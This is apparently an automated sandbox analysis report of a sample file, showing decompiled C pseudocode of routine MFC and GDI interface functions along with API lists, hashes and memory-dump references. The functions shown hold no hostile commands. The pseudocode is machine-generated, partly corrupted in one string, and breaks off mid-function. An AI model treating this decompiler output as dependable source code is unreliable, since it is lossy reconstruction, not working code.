0x00cde27a
0x00cde280
0x00cde282
0x00cde284
0x00cde284
0x00cde288
0x00cde28a
0x00cde28d
0x00cde28f
0x00cde292
0x00cde292
0x00cde297
0x00cde29d
0x00cde2a3
0x00cde2a9
0x00cde2a9
0x00cde2ac
0x00cde2b2
0x00cde2b5
0x00cde2b8
0x00cde2be
0x00cde2be
0x00cde2c3
0x00cde2c6
0x00cde2c9
0x00cde2cc
0x00cde2cc
0x00cde2cf
0x00cde2d2
0x00cde2d4
0x00cde2d7
0x00cde2da
0x00cde2dd
0x00cde2dd
0x00cde22a
0x00000000
0x00cde20f
0x00cde207
0x00cde1f6
0x00cde1e9
0x00cde1d3
0x00cde1a4
0x00cde2ee

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDE174
GetObjectA.GDI32(?,00000018,?), ref: 00CDE19C
GetObjectA.GDI32(?,00000054,?), ref: 00CDE1E1
CreateCompatibleDC.GDI32(00000000), ref: 00CDE302
SelectObject.GDI32(?,?), ref: 00CDE327
GetPixel.GDI32(?,00000000,00000000), ref: 00CDE378
GetPixel.GDI32(?,?,00000000), ref: 00CDE38A
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00CDE399
SetPixel.GDI32(?,?,00000000,00000000), ref: 00CDE3AB
SelectObject.GDI32(?,00000000), ref: 00CDE3F0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
String ID:
API String ID: 1266819874-0
Opcode ID: 44e45db67f197c1db238aff037c4355502c9c00436ae51c4c7bd10b9e9dad491
Instruction ID: 4632852a80a8f705e718ab4d4f6d587a24728807ad8230739212114517006256
Opcode Fuzzy Hash: 44e45db67f197c1db238aff037c4355502c9c00436ae51c4c7bd10b9e9dad491
Instruction Fuzzy Hash: 92811970E002199FDB24DFA9CC84A9DBBB6FF48300F24816AE959AB311DB309D85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF339 Relevance: 15.2, APIs: 10, Instructions: 203
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CDF339(void* __eax) {

				_t2 = __eax + 0xdd;
				return E00DDD4FA(_t2);
			}

0x00cdf339
0x00cdf343

APIs

TransparentBlt.MSIMG32(?,?,?,?,?,?,?,?,?,?,?,00000048,00CDC7E3,?,?,?), ref: 00CDF39F
CreateCompatibleDC.GDI32(?), ref: 00CDF3DF
CreateCompatibleDC.GDI32(?), ref: 00CDF400
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CDF425
StretchBlt.GDI32(?,00000000,00000000,?,?,00000004,00000000,00E196B4,?,00000000,00CC0020), ref: 00CDF47B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CompatibleCreate$BitmapStretchTransparent
String ID:
API String ID: 2909361496-0
Opcode ID: 8b92cdb2bd350b35f9fe34c4e0ff6ca6ef711d2308e42b5a0c925602a2322b9a
Instruction ID: 031adaf8c4345841351f478490d8e901411c525b35d351885eb0052975901f61
Opcode Fuzzy Hash: 8b92cdb2bd350b35f9fe34c4e0ff6ca6ef711d2308e42b5a0c925602a2322b9a
Instruction Fuzzy Hash: C3711231901119AFCF12AFA0DD89EEEBB79FF18750F104018FA16761A1DB319E15EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD528 Relevance: 15.1, APIs: 10, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CBD528(void* __ebx, struct HWND__* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t45;
				signed int _t46;
				void* _t50;
				struct HWND__* _t51;
				signed int _t56;
				signed int _t77;
				struct HWND__* _t78;
				void* _t89;
				struct HWND__* _t91;
				void* _t93;
				struct HWND__* _t96;
				struct HWND__* _t98;
				struct HINSTANCE__* _t99;
				void* _t100;
				void* _t101;

				_t101 = __eflags;
				_t89 = __edx;
				_push(0x24);
				E00DDD595(0xe08d1d, __ebx, __edi, __esi);
				_t91 = __ecx;
				 *((intOrPtr*)(_t100 - 0x24)) = __ecx;
				_t77 =  *(__ecx + 0x8c);
				_t93 =  *(__ecx + 0x88);
				 *(_t100 - 0x1c) = _t77;
				_t45 = E00CACEEE(_t77, __ecx, _t93, _t101);
				_t102 =  *(_t91 + 0x84);
				_t46 =  *(_t45 + 0xc);
				 *(_t100 - 0x20) = _t46;
				if( *(_t91 + 0x84) != 0) {
					_t99 =  *(E00CACEEE(_t77, _t91, _t93, _t102) + 0xc);
					 *(_t100 - 0x20) = _t99;
					_t46 = LoadResource(_t99, FindResourceA(_t99,  *(_t91 + 0x84), 5));
					_t93 = _t46;
				}
				if(_t93 != 0) {
					_t46 = LockResource(_t93);
					_t77 = _t46;
					 *(_t100 - 0x1c) = _t46;
				}
				if(_t77 != 0) {
					_t80 = _t91;
					_t78 = E00CBDB2C(_t77, _t91, _t89, __eflags);
					 *(_t100 - 0x2c) = _t78;
					E00CB13EC(_t78, _t89, __eflags);
					_t94 = 0;
					 *(_t100 - 0x18) =  *(_t100 - 0x18) & 0;
					 *(_t100 - 0x28) =  *(_t100 - 0x28) & 0;
					 *(_t100 - 0x14) = 0;
					__eflags = _t78;
					if(__eflags != 0) {
						__eflags = _t78 - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled(_t78);
							if(__eflags != 0) {
								EnableWindow(_t78, 0);
								 *(_t100 - 0x14) = 1;
								_t96 = E00CAC659(_t80, 0, __eflags);
								 *(_t100 - 0x18) = _t96;
								__eflags = _t96;
								if(__eflags != 0) {
									 *0xe17a64();
									_t80 =  *(_t100 - 0x18);
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t96->i + 0x150))))();
									if(__eflags != 0) {
										_t98 =  *(_t100 - 0x18);
										_t80 = _t98;
										__eflags = E00CB7881(_t98);
										if(__eflags != 0) {
											_t80 = _t98;
											E00CB7654(_t98, 0);
											 *(_t100 - 0x28) = 1;
										}
									}
								}
								_t94 =  *(_t100 - 0x14);
							}
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
					_push(_t91);
					E00CB10B9(_t78, _t89, _t91, _t94, __eflags);
					_t50 = E00CB277F(_t78, _t80, _t89, _t78);
					_t81 = _t91;
					_t51 = E00CBD4CB(_t78, _t91, _t89, __eflags,  *(_t100 - 0x1c), _t50,  *(_t100 - 0x20));
					__eflags = _t51;
					if(_t51 == 0) {
						__eflags =  *(_t91 + 0x9c) - _t51;
						if(__eflags == 0) {
							 *(_t100 - 0x20) =  *(E00CACEEE(_t78, _t91, _t94, __eflags) + 8);
							E00CBD4CB(_t78, _t91, _t89, __eflags,  *(_t100 - 0x1c), E00CB277F(_t78, _t81, _t89, _t78),  *(_t100 - 0x20));
						}
					}
					 *(_t91 + 0x9c) =  *(_t91 + 0x9c) & 0x00000000;
					 *(_t100 - 4) =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *(_t100 - 0x28);
					if( *(_t100 - 0x28) != 0) {
						E00CB7654( *(_t100 - 0x18), 1);
					}
					__eflags = _t94;
					if(_t94 != 0) {
						EnableWindow(_t78, 1);
					}
					__eflags = _t78;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t91 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow(_t78);
						}
					}
					 *0xe17a64();
					 *((intOrPtr*)( *((intOrPtr*)(_t91->i + 0x60))))();
					E00CBDAE3(_t78, _t91, _t89, _t91,  *((intOrPtr*)(_t91->i + 0x60)), __eflags);
					_t56 =  *(_t91 + 0x68);
					goto L26;
				} else {
					_t56 = _t46 | 0xffffffff;
					L26:
					return E00DDD4FA(_t56);
				}
			}

0x00cbd528
0x00cbd528
0x00cbd528
0x00cbd52f
0x00cbd534
0x00cbd536
0x00cbd539
0x00cbd53f
0x00cbd545
0x00cbd548
0x00cbd54d
0x00cbd554
0x00cbd557
0x00cbd55a
0x00cbd569
0x00cbd56d
0x00cbd578
0x00cbd57e
0x00cbd57e
0x00cbd582
0x00cbd585
0x00cbd58b
0x00cbd58d
0x00cbd58d
0x00cbd592
0x00cbd59c
0x00cbd5a3
0x00cbd5a5
0x00cbd5a8
0x00cbd5ad
0x00cbd5af
0x00cbd5b2
0x00cbd5b5
0x00cbd5b8
0x00cbd5ba
0x00cbd5c2
0x00cbd5c4
0x00cbd5cd
0x00cbd5cf
0x00cbd5d3
0x00cbd5d9
0x00cbd5e5
0x00cbd5e7
0x00cbd5ea
0x00cbd5ec
0x00cbd5f8
0x00cbd5fe
0x00cbd603
0x00cbd605
0x00cbd607
0x00cbd60a
0x00cbd611
0x00cbd613
0x00cbd617
0x00cbd619
0x00cbd61e
0x00cbd61e
0x00cbd613
0x00cbd605
0x00cbd625
0x00cbd625
0x00cbd5cf
0x00cbd5c4
0x00cbd628
0x00cbd62c
0x00cbd62d
0x00cbd633
0x00cbd63b
0x00cbd641
0x00cbd646
0x00cbd648
0x00cbd64a
0x00cbd650
0x00cbd65b
0x00cbd66c
0x00cbd66c
0x00cbd650
0x00cbd671
0x00cbd69c
0x00cbd6a0
0x00cbd6a4
0x00cbd6ab
0x00cbd6ab
0x00cbd6b0
0x00cbd6b2
0x00cbd6b7
0x00cbd6b7
0x00cbd6bd
0x00cbd6bf
0x00cbd6c7
0x00cbd6ca
0x00cbd6cd
0x00cbd6cd
0x00cbd6ca
0x00cbd6da
0x00cbd6e2
0x00cbd6e6
0x00cbd6eb
0x00000000
0x00cbd594
0x00cbd594
0x00cbd6ee
0x00cbd6f3
0x00cbd6f3

APIs

__EH_prolog3_catch.LIBCMT ref: 00CBD52F
FindResourceA.KERNEL32(?,00000000,00000005), ref: 00CBD570
LoadResource.KERNEL32(?,00000000), ref: 00CBD578

Part of subcall function 00CB13EC: UnhookWindowsHookEx.USER32(?), ref: 00CB1416

LockResource.KERNEL32(?), ref: 00CBD585
GetDesktopWindow.USER32 ref: 00CBD5BC
IsWindowEnabled.USER32(00000000), ref: 00CBD5C7
EnableWindow.USER32(00000000,00000000), ref: 00CBD5D3

Part of subcall function 00CB7881: IsWindowEnabled.USER32(?), ref: 00CB788C

Part of subcall function 00CB7654: EnableWindow.USER32(?,00000000), ref: 00CB7665

EnableWindow.USER32(00000000,00000001), ref: 00CBD6B7
GetActiveWindow.USER32 ref: 00CBD6C1
SetActiveWindow.USER32(00000000,?,?,?,?,?,00000000), ref: 00CBD6CD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$EnableResource$ActiveEnabled$DesktopFindH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 2731338901-0
Opcode ID: 00254e79d2ba345434e68b8b4c54883b90bc7ee128e0ffa16faf1751711cc1a2
Instruction ID: 162d598996d0473b46f45209a9128b1c8a2ab8ad034e9cfc4610afe138bcb510
Opcode Fuzzy Hash: 00254e79d2ba345434e68b8b4c54883b90bc7ee128e0ffa16faf1751711cc1a2
Instruction Fuzzy Hash: 13517F70A002169FCB14AFA1C8896EEBBB5BF48711F044515F81AB7291EB749D01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF22B7 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00CF22B7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr* _t138;
				void* _t141;
				intOrPtr _t143;
				intOrPtr* _t155;
				intOrPtr _t156;
				intOrPtr* _t172;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				intOrPtr _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				intOrPtr* _t184;
				intOrPtr* _t188;
				void* _t234;
				intOrPtr* _t236;
				intOrPtr* _t237;
				intOrPtr _t238;
				intOrPtr _t246;
				intOrPtr* _t253;
				intOrPtr* _t256;
				void* _t260;

				_t234 = __edx;
				E00DDD52C(0xe0b6af, __ebx, __edi, __esi);
				_t178 = __ecx;
				E00CC0B9E(_t260 - 0x28, 0xa);
				_t236 =  *((intOrPtr*)(_t260 + 8));
				 *(_t260 - 4) =  *(_t260 - 4) & 0x00000000;
				 *0xe17a64("OrigResetItems", _t260 - 0x28, 0x1c);
				_t188 = _t236;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t236 + 0x40))))() == 0 ||  *((intOrPtr*)(_t260 - 0x1c)) <= 0) {
					L13:
					E00CC0BC4(_t260 - 0x28);
					return E00DDD4FA(1);
				} else {
					if( *((intOrPtr*)(__ecx + 0xc80)) != 0) {
						_t172 = __ecx + 0xc74;
						do {
							_t188 = _t172;
							_t236 = E00CB806B(_t178, _t188, _t236);
							if(_t236 != 0) {
								 *0xe17a64(1);
								_t188 = _t236;
								 *((intOrPtr*)( *((intOrPtr*)( *_t236 + 4))))();
							}
							_t172 = _t178 + 0xc74;
						} while ( *((intOrPtr*)(_t178 + 0xc80)) != 0);
					}
					_t256 =  *((intOrPtr*)(_t260 - 0x24));
					while(_t256 != 0) {
						_t237 = _t256;
						__eflags = _t256;
						if(__eflags == 0) {
							E00CAA4E7(_t178, _t188, _t237, _t256, __eflags);
							asm("int3");
							E00DDD595(0xe0b6fc, _t178, _t237, _t256);
							_t179 = _t188;
							 *((intOrPtr*)(_t260 - 0x20)) = _t179;
							E00D52263(_t179, _t237, _t256, __eflags, _t260 - 0x28, "MFCToolBars",  *((intOrPtr*)(_t260 + 8)), 0xac);
							_t238 =  *((intOrPtr*)(_t260 + 0xc));
							 *(_t260 - 4) = 0;
							__eflags = _t238 - 0xffffffff;
							if(_t238 == 0xffffffff) {
								_t238 = E00CB7697(_t179);
								 *((intOrPtr*)(_t260 + 0xc)) = _t238;
							}
							E00CA67E1(_t260 - 0x1c);
							_t114 =  *((intOrPtr*)(_t260 + 0x10));
							 *(_t260 - 4) = 1;
							__eflags = _t114 - 0xffffffff;
							if(_t114 != 0xffffffff) {
								_push(_t114);
								_push(_t238);
								E00CA6953(_t260 - 0x1c, "%TsMFCToolBar-%d%x",  *((intOrPtr*)(_t260 - 0x28)));
							} else {
								_push(_t238);
								E00CA6953(_t260 - 0x1c, "%TsMFCToolBar-%d",  *((intOrPtr*)(_t260 - 0x28)));
							}
							 *((intOrPtr*)(_t260 - 0x24)) = 0;
							 *((intOrPtr*)(_t260 - 0x30)) = 0;
							 *((intOrPtr*)(_t260 - 0x2c)) = 0;
							 *(_t260 - 4) = 2;
							_t117 = E00D52432(_t260 - 0x30, 0, 1);
							_t258 =  *((intOrPtr*)(_t260 - 0x1c));
							 *((intOrPtr*)(_t260 - 0x18)) = _t117;
							 *0xe17a64( *((intOrPtr*)(_t260 - 0x1c)));
							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x10))))();
							__eflags = _t119;
							if(_t119 != 0) {
								 *0xe17a64("Buttons", _t260 - 0x24, _t260 - 0x34);
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 - 0x18)))) + 0x44))))();
								if(__eflags != 0) {
									 *(_t260 - 4) = 3;
									E00D792B9(_t179, _t260 - 0x70, 0, _t258, __eflags);
									 *(_t260 - 4) = 4;
									E00CAE222(_t179, _t260 - 0xb8, 0, _t258, __eflags, _t260 - 0x70, 1, 0x1000, 0,  *((intOrPtr*)(_t260 - 0x24)));
									 *(_t260 - 4) = 5;
									 *0xe17a64(_t260 - 0xb8,  *((intOrPtr*)(_t260 - 0x34)), 0);
									 *((intOrPtr*)( *((intOrPtr*)( *_t179 + 8))))();
									 *((intOrPtr*)(_t260 - 0x14)) = 1;
									E00CAE355(_t260 - 0xb8, _t234);
									E00D79316(_t260 - 0x70);
									_t243 = 0;
									__eflags =  *((intOrPtr*)(_t260 - 0x24));
									 *(_t260 - 4) = 2;
									if(__eflags != 0) {
										L00CA95BB( *((intOrPtr*)(_t260 - 0x24)));
									}
									_push( *((intOrPtr*)(_t260 - 0x18)));
									E00CF22B7(_t179, _t179, _t234, _t243, _t258, __eflags);
									_t138 = E00CACA6C(0xe25398,  *((intOrPtr*)(E00CACEEE(_t179, _t243, _t258, __eflags) + 4)));
									__eflags =  *((intOrPtr*)(_t260 - 0x14));
									if(__eflags != 0) {
										__eflags = _t138;
										if(__eflags != 0) {
											__eflags =  *((intOrPtr*)(_t138 + 0x10c)) - _t243;
											if(__eflags != 0) {
												_t243 =  *((intOrPtr*)( *_t179 + 0x42c));
												 *0xe17a64( *((intOrPtr*)(_t260 - 0x18)));
												 *((intOrPtr*)( *((intOrPtr*)( *_t179 + 0x42c))))();
											}
										}
									}
									 *((intOrPtr*)(_t260 - 0x18)) = E00CE3B1E(_t179, _t179, _t243, _t258, __eflags,  *((intOrPtr*)(_t260 + 8)),  *((intOrPtr*)(_t260 + 0xc)),  *((intOrPtr*)(_t260 + 0x10)));
									 *0xe17a64();
									_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t179 + 0x20c))))();
									__eflags =  *((intOrPtr*)(_t179 + 0xb8));
									if( *((intOrPtr*)(_t179 + 0xb8)) != 0) {
										__eflags =  *((intOrPtr*)(_t179 + 0xbc));
										if( *((intOrPtr*)(_t179 + 0xbc)) != 0) {
											_t181 =  *_t179;
											 *0xe17a64();
											 *0xe17a64(_t260 - 0x3c, 1,  *((intOrPtr*)( *((intOrPtr*)(_t181 + 0x164))))());
											_t182 =  *((intOrPtr*)(_t260 - 0x20));
											 *((intOrPtr*)( *((intOrPtr*)(_t181 + 0x260))))();
											 *((intOrPtr*)(_t260 - 0x14)) =  *((intOrPtr*)(_t182 + 0xb8));
											 *0xe17a64();
											_t155 =  *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x164))))();
											__eflags = _t155;
											_t156 =  *((intOrPtr*)(_t260 - 0x38));
											if(_t155 == 0) {
												_t156 =  *((intOrPtr*)(_t260 - 0x3c));
											}
											_t125 = E00D5AB40( *((intOrPtr*)(_t260 - 0x14)),  *((intOrPtr*)(_t182 + 0xbc)), _t156, 1);
										}
									}
									_t180 =  *((intOrPtr*)(_t260 - 0x30));
									__eflags = _t180;
									if(_t180 != 0) {
										 *0xe17a64(1);
										_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 4))))();
									}
									_t246 =  *((intOrPtr*)(_t260 - 0x18));
								} else {
									_t183 =  *((intOrPtr*)(_t260 - 0x30));
									__eflags = _t183;
									if(_t183 != 0) {
										 *0xe17a64(1);
										_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t183 + 4))))();
									}
									_t246 = 0;
								}
								_t141 = E00CA2975(_t125, _t258 - 0x10);
								__eflags =  *((intOrPtr*)(_t260 - 0x28)) + 0xfffffff0;
								E00CA2975(_t141,  *((intOrPtr*)(_t260 - 0x28)) + 0xfffffff0);
								_t143 = _t246;
							} else {
								_t184 =  *((intOrPtr*)(_t260 - 0x30));
								__eflags = _t184;
								if(_t184 != 0) {
									 *0xe17a64(1);
									_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
								}
								E00CA2975(E00CA2975(_t119, _t258 - 0x10),  *((intOrPtr*)(_t260 - 0x28)) - 0x10);
								_t143 = 0;
							}
							return E00DDD4FA(_t143);
						} else {
							_t253 =  *((intOrPtr*)(_t237 + 8));
							_t256 =  *_t256;
							__eflags = _t253;
							if(_t253 != 0) {
								_t188 = _t253;
								__eflags = E00CACB0B(_t188, "\xef\xbf\xbd\								if(__eflags != 0) {
									_t188 = _t178 + 0xc74;
									E00CB7F2F(_t188, __eflags, _t253);
								}
							}
							continue;
						}
						goto L44;
					}
					goto L13;
				}
				L44:
			}

0x00cf22b7
0x00cf22be
0x00cf22c3
0x00cf22ca
0x00cf22cf
0x00cf22d2
0x00cf22e6
0x00cf22ec
0x00cf22f2
0x00cf236c
0x00cf236f
0x00cf237c
0x00cf22fa
0x00cf2301
0x00cf2303
0x00cf2309
0x00cf2309
0x00cf2310
0x00cf2314
0x00cf231f
0x00cf2325
0x00cf2327
0x00cf2327
0x00cf2330
0x00cf2330
0x00cf2309
0x00cf2338
0x00cf2368
0x00cf233d
0x00cf233f
0x00cf2341
0x00cf237f
0x00cf2384
0x00cf238f
0x00cf2394
0x00cf2396
0x00cf23a5
0x00cf23ad
0x00cf23b2
0x00cf23b5
0x00cf23b8
0x00cf23c1
0x00cf23c3
0x00cf23c3
0x00cf23c9
0x00cf23ce
0x00cf23d1
0x00cf23d5
0x00cf23d8
0x00cf23f1
0x00cf23f2
0x00cf23ff
0x00cf23da
0x00cf23da
0x00cf23e7
0x00cf23ec
0x00cf2407
0x00cf240a
0x00cf240d
0x00cf2416
0x00cf241a
0x00cf241f
0x00cf2423
0x00cf242d
0x00cf2436
0x00cf2438
0x00cf243a
0x00cf2487
0x00cf2492
0x00cf2494
0x00cf24b9
0x00cf24c7
0x00cf24d7
0x00cf24e2
0x00cf24e9
0x00cf24f9
0x00cf2501
0x00cf2509
0x00cf2510
0x00cf2518
0x00cf251d
0x00cf253c
0x00cf2540
0x00cf2547
0x00cf254c
0x00cf2551
0x00cf2552
0x00cf2557
0x00cf256a
0x00cf256f
0x00cf2575
0x00cf2577
0x00cf2579
0x00cf257b
0x00cf2581
0x00cf2588
0x00cf2590
0x00cf2598
0x00cf2598
0x00cf2581
0x00cf2579
0x00cf25ac
0x00cf25b7
0x00cf25bf
0x00cf25c3
0x00cf25c9
0x00cf25cb
0x00cf25d1
0x00cf25d3
0x00cf25dd
0x00cf25f7
0x00cf25fd
0x00cf2602
0x00cf260a
0x00cf2617
0x00cf261f
0x00cf2621
0x00cf2623
0x00cf2626
0x00cf2628
0x00cf2628
0x00cf2637
0x00cf2637
0x00cf25d1
0x00cf263c
0x00cf263f
0x00cf2641
0x00cf264c
0x00cf2654
0x00cf2654
0x00cf2656
0x00cf2496
0x00cf2496
0x00cf2499
0x00cf249b
0x00cf24a6
0x00cf24ae
0x00cf24ae
0x00cf24b0
0x00cf24b0
0x00cf265c
0x00cf2664
0x00cf2667
0x00cf266c
0x00cf243c
0x00cf243c
0x00cf243f
0x00cf2441
0x00cf244c
0x00cf2454
0x00cf2454
0x00cf2464
0x00cf2469
0x00cf2469
0x00cf2673
0x00cf2343
0x00cf2343
0x00cf2346
0x00cf2348
0x00cf234a
0x00cf2351
0x00cf2358
0x00cf235a
0x00cf235d
0x00cf2363
0x00cf2363
0x00cf235a
0x00000000
0x00cf234a
0x00000000
0x00cf2341
0x00000000
0x00cf2368
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00CF22BE
__EH_prolog3_catch.LIBCMT ref: 00CF238F

Strings

%TsMFCToolBar-%d, xrefs: 00CF23E1
MFCToolBars, xrefs: 00CF239F
OrigResetItems, xrefs: 00CF22DF
%TsMFCToolBar-%d%x, xrefs: 00CF23F9
Buttons, xrefs: 00CF2482
, xrefs: 00CF234C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3H_prolog3_catch
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$OrigResetItems$
API String ID: 1882928916-4145850733
Opcode ID: e78ff8b7c464bf3d03ead703b5936fd738218c5f3ed866f4ab6851a42aa80855
Instruction ID: 288a1c8862604200f93d1048451fe6297ac3759d0e7143f5c17ae53d789629b2
Opcode Fuzzy Hash: e78ff8b7c464bf3d03ead703b5936fd738218c5f3ed866f4ab6851a42aa80855
Instruction Fuzzy Hash: F2B1A031A002099FCF10EFA4C895EFD77B6AF89714F144068F915AB3A1DB74AE09DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2AF7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00CD2AF7(intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				long _v8;
				signed int _v12;
				struct HMENU__* _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				long _v84;
				intOrPtr _v112;
				void* _v116;
				void* __ebx;
				long _t59;
				struct HMENU__* _t71;
				intOrPtr* _t72;
				signed int _t79;
				intOrPtr* _t95;
				intOrPtr* _t104;
				intOrPtr* _t105;
				intOrPtr* _t106;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t119;
				struct HMENU__* _t120;
				intOrPtr* _t121;

				_t110 = __edi;
				_t95 = __ecx;
				E00DDFBE0(__edi,  &_v116, 0, 0x3c);
				_v112 = _a4;
				_v116 = 4;
				_t59 = SendMessageA( *(_t95 + 0x20), 0x1005, 0,  &_v116);
				if(_t59 == 0) {
					L21:
					return _t59;
				}
				_t59 = _v84;
				_v8 = _t59;
				if(_t59 == 0) {
					goto L21;
				}
				_push(_t110);
				_t111 =  *_t59;
				if(_t111 == 0) {
					L20:
					return _t59;
				}
				_t59 = _t59 + 8;
				_v16 = _t59;
				if( *_t59 == 0) {
					goto L20;
				}
				 *0xe17a64(_t111);
				_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 4))))();
				if(_t111 == 0) {
					goto L20;
				}
				_v12 = 0x20000000;
				 *0xe17a64(_t111, 1, _v16,  &_v12);
				 *((intOrPtr*)( *_t111 + 0x24))();
				if((_v12 & 0x20000000) == 0) {
					 *0xe17a64(_t111,  *(_t95 + 0x20), 1, _v16, 0xe3eeac, 0,  &_v8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x28))))() < 0) {
						goto L19;
					}
					_t71 = CreatePopupMenu();
					_v16 = _t71;
					if(_t71 != 0) {
						_t109 = _v8;
						_t119 =  *((intOrPtr*)( *_t109 + 0xc));
						_t104 = _t119;
						 *0xe17a64(_t109, _t71, 0, 1, 0x7fff, 5);
						if( *_t119() >= 0) {
							_t120 = GetMenuDefaultItem(_v16, 0, 0);
							_v16 = _t120;
							if(_t120 != 0 && _t120 != 0xffffffff) {
								_v52 = _v52 & 0x00000000;
								_v56 = 0x24;
								_t79 = E00CB277F(_t95, _t104, _t109, GetParent( *(_t95 + 0x20)));
								if(_t79 != 0) {
									_v48 =  *((intOrPtr*)(_t79 + 0x20));
								} else {
									_v48 = _v48 & _t79;
								}
								_t105 = _v8;
								_t39 = _t120 - 1; // -1
								_v44 = _t39;
								_v40 = 0;
								_v36 = 0;
								_v28 = 0;
								_v24 = 0;
								_v32 = 1;
								_t121 =  *((intOrPtr*)( *_t105 + 0x10));
								_t106 = _t121;
								 *0xe17a64(_t105,  &_v56);
